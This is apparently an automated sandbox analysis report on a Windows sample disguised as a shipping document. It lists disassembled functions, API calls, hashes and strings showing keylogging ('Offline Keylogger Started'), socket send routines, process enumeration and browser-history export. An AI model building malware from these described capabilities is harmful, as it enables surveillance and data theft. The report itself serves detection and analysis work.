                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                      • String ID: KeepAlive | Disabled
                                                      • API String ID: 2993684571-305739064
                                                      • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                      • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                      • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                      • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                      Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                      • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                      • Sleep.KERNEL32(00002710), ref: 00419F79
                                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                                      • String ID: Alarm triggered
                                                      • API String ID: 614609389-2816303416
                                                      • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                      • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                      • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                      • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                      Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                      Strings
                                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                      • API String ID: 3024135584-2418719853
                                                      • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                      • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                      • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                      • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                      Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                      • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                      • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                      • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                      Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                      • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                      • String ID:
                                                      • API String ID: 3525466593-0
                                                      • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                      • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                      • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                      • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                      Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                        • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 4269425633-0
                                                      • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                      • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                      • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                      • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                      Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                      • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                      • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                      • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                      Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                      • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                      • __freea.LIBCMT ref: 0044FFC4
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                      • String ID:
                                                      • API String ID: 313313983-0
                                                      • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                      • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                      • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                      • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                      Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                      • _free.LIBCMT ref: 0044E1A0
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                      • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                      • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                      • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                      Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                      • _free.LIBCMT ref: 00446F7D
                                                      • _free.LIBCMT ref: 00446FA4
                                                      • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                      • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                      • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                      • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                      • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                      Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 0044F7B5
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 0044F7C7
                                                      • _free.LIBCMT ref: 0044F7D9
                                                      • _free.LIBCMT ref: 0044F7EB
                                                      • _free.LIBCMT ref: 0044F7FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                      • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                      • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                      • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                      Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00443305
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 00443317
                                                      • _free.LIBCMT ref: 0044332A
                                                      • _free.LIBCMT ref: 0044333B
                                                      • _free.LIBCMT ref: 0044334C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                      • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                      • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                      • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                      Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                      • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                      • IsWindowVisible.USER32(?), ref: 004167A1
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessWindow$Open$TextThreadVisible
                                                      • String ID: (FG
                                                      • API String ID: 3142014140-2273637114
                                                      • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                      • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                      • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                      • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                      Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _strpbrk.LIBCMT ref: 0044D4A8
                                                      • _free.LIBCMT ref: 0044D5C5
                                                        • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                        • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                        • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                      • String ID: *?$.
                                                      • API String ID: 2812119850-3972193922
                                                      • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                      • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                      • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                      • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                      Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                        • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                        • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                        • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                      • String ID: XCG$`AG$>G
                                                      • API String ID: 2334542088-2372832151
                                                      • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                      • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                      • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                      • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                      Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000104), ref: 00442714
                                                      • _free.LIBCMT ref: 004427DF
                                                      • _free.LIBCMT ref: 004427E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                      • API String ID: 2506810119-3579038444
                                                      • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                      • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                      • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                      • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                      Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                        • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                      • String ID: /sort "Visit Time" /stext "$8>G
                                                      • API String ID: 368326130-2663660666
                                                      • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                      • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                      • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                      • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                      Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                      • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                      • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread$LocalTimewsprintf
                                                      • String ID: Offline Keylogger Started
                                                      • API String ID: 465354869-4114347211
                                                      • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                      • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                      • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                      • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                      Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
